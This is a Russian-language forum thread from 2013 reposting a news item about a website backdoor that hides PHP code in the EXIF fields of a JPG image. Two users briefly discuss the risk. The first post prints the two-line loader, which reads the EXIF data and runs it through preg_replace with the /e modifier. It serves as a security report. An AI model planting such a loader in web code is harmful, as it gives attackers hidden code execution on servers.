THG.RU | \"Поиск\" Поиск \"Поиск\" | Новости | Видеокарты | Процессоры | Материнские платы | Мониторы | Аудио/видео | HDD и CD/DVD | Собери сам | Игры | Софт | Домашний ПК


Клуб экспертов THG.ru   

Вернуться   Клуб экспертов THG.ru > Софт > Антивирусная защита, Malware (вредоносное ПО)

Регистрация Правила форума FAQ форума Справка Пользователи Поиск Сообщения за день Все разделы прочитаны

Антивирусная защита, Malware (вредоносное ПО) Вирусы, руткиты, троянцы, программы-блокираторы - обмен опытом по избавлению компьютерного пространства от непрошеных гостей и подбору утилит, способных в этом помочь.

Ответ
 
Опции темы Опции просмотра
Старый 17.07.2013, 14:13   #1
Меню пользователя dr-web
VIP-пользователь
 
Аватар для dr-web
  
Бэкдор - в служебном поле EXIF изображения JPG

Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может быть или новое изображение, которое пользователям разрешено добавлять на сайт, например, в качестве своего аватара или другой фотографии на форуме. Или это может быть измененная версия оригинального изображения.

На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для считывания служебных данных EXIF из файла JPG, а вторая функция запускает программу.

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
Как и следовало предполагать, вторую часть бэкдора нашли в файле bun.jpg.

Оффтоппараметр /e используется для исполнения передаваемого ему кода. В то же время заголовок Model содержит непосредственно сам код.

Если расшифровать текст, закодированный в base64, то мы увидим следующее.

Оффтоп

По мнению исследователей, это довольно необычный способ прятать исполняемый код на сайте. Эдакий взлом с элементами стеганографии.
http://www.xakep.ru/post/60928/
__________________
Главное,чтобы работало,а веришь ты в это или нет - не важно.
dr-web вне форума   Ответить с цитированием
Старый 17.07.2013, 14:20   #2
Меню пользователя dude
любитель троек нахаляву
  
фух..... я уж думал прямо в обычном джипеге при открытии из папки на харде можно что-то схватить.
хотя всё равно неприятно..... дырка получается огромная. и желающих её использовать будит много.
dude вне форума   Ответить с цитированием
Старый 17.07.2013, 14:35   #3
Меню пользователя dr-web
VIP-пользователь
 
Аватар для dr-web
  
я вообще не знаю почему только сейчас об этом написали,этой уязвимости уж как года 2 если не более.
__________________
Главное,чтобы работало,а веришь ты в это или нет - не важно.
dr-web вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Справочник словарей
Словари русского языка - www.gramota.ru Яndex - Словари Википедия - ru.wikipedia.org

Часовой пояс GMT +4, время: 11:10.


Powered by: vBulletin, ©2000 - 2007, Jelsoft Enterprises Limited.
Перевод: zCarot
Распространение информации возможно только с письменного разрешения администрации издания.

THG.ru ("Русский Tom's Hardware Guide") входит в международную сеть TG Publishing

РЕКЛАМА

Rambler's Top100 Рейтинг@Mail.ru